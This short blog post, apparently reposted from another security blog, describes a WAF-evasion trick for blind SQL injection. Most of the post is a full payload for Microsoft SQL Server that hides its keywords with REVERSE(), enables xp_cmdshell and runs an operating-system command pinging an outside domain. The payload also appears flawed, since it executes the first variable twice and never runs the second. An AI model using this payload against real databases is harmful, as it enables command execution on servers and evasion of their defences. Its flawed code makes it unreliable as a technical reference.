An interesting blog about reverse blind SQL injection
The application is subject to Blind SQL injection and the company is deploying both web application firewalls and network intrusion Prevention System. It seems that the web application firewall does an excellent job at staying current with the latest methods for bypassing Web Application Firewall technologies.
However, the backward attack is working. Most SQL databases support a reverse function. Here is the attack
var=1';DECLARE @a varchar(200) DECLARE @b varchar(200) DECLARE @c varchar(200) SET @a = REVERSE ('1 ,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @b = REVERSE ('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @c =REVERSE('"moc.dragarten gnip" llehsdmc_px') EXEC (@c);--
http://snosoft.blogspot.com/2010/05/reversenoitcejni-lqs-dnilb-bank-hacking.html
No comments:
Post a Comment